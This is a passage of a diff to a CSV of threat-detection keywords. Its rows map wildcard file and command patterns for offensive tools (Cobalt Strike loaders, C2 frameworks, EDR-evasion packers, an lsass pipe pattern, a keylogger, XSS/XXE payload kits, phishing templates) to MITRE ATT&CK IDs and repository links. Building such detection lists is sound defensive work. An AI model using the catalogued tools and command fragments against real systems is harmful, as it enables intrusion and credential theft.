TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*xmendez/wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*x-ishavocframework*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*xmendez/wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*XML-External-Entity-(XXE)-Payloads*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" "*xor.exe *.txt*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","0","N/A","10","10","277","61","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z" "*xor.py *.dll*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" 
@@ -18530,36 +18718,36 @@ "*xor_payload*","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Unknow101/FuckThatPacker","1","1","N/A","10","10","612","91","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z" "*xor-bin.py *.exe*","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","0","N/A","N/A","2","196","38","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" "*xoreaxeaxeax*","offensive_tool_keyword","Github Username","github username hosting obfuscation and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/xoreaxeaxeax","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*XorEncoder.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - 
TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*XOR-Payloads.py*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*XorEncoder.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*XOR-Payloads.py*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*xpipe \\*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows 
Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","0","N/A","10","10","73","21","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" "*xpipe*lsass*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 
- TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","73","21","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" "*xpipe.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","73","21","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" "*xpipe.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","73","21","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" "*xpipe.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","73","21","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" "*xpn*ntlmquic*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" -"*xrdp.c*","offensive_tool_keyword","xrdp","xrdp provides a graphical login to remote machines using Microsoft Remote Desktop Protocol (RDP). xrdp accepts connections from a variety of RDP clients: FreeRDP. rdesktop. NeutrinoRDP and Microsoft Remote Desktop Client (for Windows. Mac OS. iOS and Android).can be used by attacker","T1076 - T1021.003 - T1021.002","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/neutrinolabs/xrdp","1","0","N/A","N/A","10","4820","2704","2023-10-02T15:48:32Z","2011-04-25T14:31:17Z" +"*xrdp.c*","offensive_tool_keyword","xrdp","xrdp provides a graphical login to remote machines using Microsoft Remote Desktop Protocol (RDP). xrdp accepts connections from a variety of RDP clients: FreeRDP. rdesktop. NeutrinoRDP and Microsoft Remote Desktop Client (for Windows. Mac OS. 
iOS and Android).can be used by attacker","T1076 - T1021.003 - T1021.002","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/neutrinolabs/xrdp","1","0","N/A","N/A","10","4824","2704","2023-10-02T15:48:32Z","2011-04-25T14:31:17Z" "*xs.exe -connect *","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*xscreensaver_log_priv_esc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*xshell_xftp_password.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*xscreensaver_log_priv_esc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*xshell_xftp_password.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*XSpear -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*xspy -display*","offensive_tool_keyword","xspy -display","Keylogger Monitors keystrokes even the keyboard is grabbed.","T1056 - T1059 - T1007 - T1113","TA0006 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/mnp/xspy/blob/master/xspy.c","1","0","N/A","N/A","1","22","15","2018-03-19T12:16:25Z","2011-07-26T18:37:00Z" "*xsrfprobe -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*xsser -u * -g */login?password=* --Coo*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*XSS-labs*","offensive_tool_keyword","xss-labs","small set of PHP scripts to practice exploiting XSS and CSRF injection vulns","T1059.003 - T1190 - T1600","TA0002 - TA0007 - ","N/A","N/A","Web Attacks","https://github.com/paralax/xss-labs","1","1","N/A","N/A","1","50","26","2017-12-22T19:38:15Z","2016-03-24T19:43:37Z" "*XSS-Payloads*","offensive_tool_keyword","XSS-Payloads","A fine collection of selected javascript payloads.","T1059 - T1068 - T1071 - T1506","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Web Attacks","http://www.xss-payloads.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*xssrays.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*xssrays.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*xssrays_spec.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*xssraysdetail.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*xssraysscan.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*XSStrike*","offensive_tool_keyword","XSStrike","Advanced XSS detection and exploitation suite.","T1189","TA0001","N/A","N/A","Exploitation tools","https://github.com/UltimateHackers/XSStrike","1","0","N/A","N/A","10","12018","1823","2023-08-05T13:49:45Z","2017-06-26T07:24:44Z" +"*xssrays.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*xssrays.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*xssrays_spec.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*xssraysdetail.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*xssraysscan.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*XSStrike*","offensive_tool_keyword","XSStrike","Advanced XSS detection and exploitation suite.","T1189","TA0001","N/A","N/A","Exploitation tools","https://github.com/UltimateHackers/XSStrike","1","0","N/A","N/A","10","12024","1823","2023-08-05T13:49:45Z","2017-06-26T07:24:44Z" "*XXEinjector*","offensive_tool_keyword","XXEinjector","XXEinjector automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. 
Bruteforcing method needs to be used for other applications.","T1573.001 - T1573.002 - T1574","TA0007 - ","N/A","N/A","Web Attacks","https://github.com/enjoiz/XXEinjector","1","1","N/A","N/A","10","1363","311","2020-08-27T12:33:26Z","2015-05-16T10:56:14Z" -"*xxePayloads.ini*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*XX-PHISHING-LINK-XX*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","10","10","2645","463","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z" -"*X-YSOSERIAL-NET*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*xxePayloads.ini*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*XX-PHISHING-LINK-XX*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","10","10","2646","464","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z" +"*X-YSOSERIAL-NET*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - 
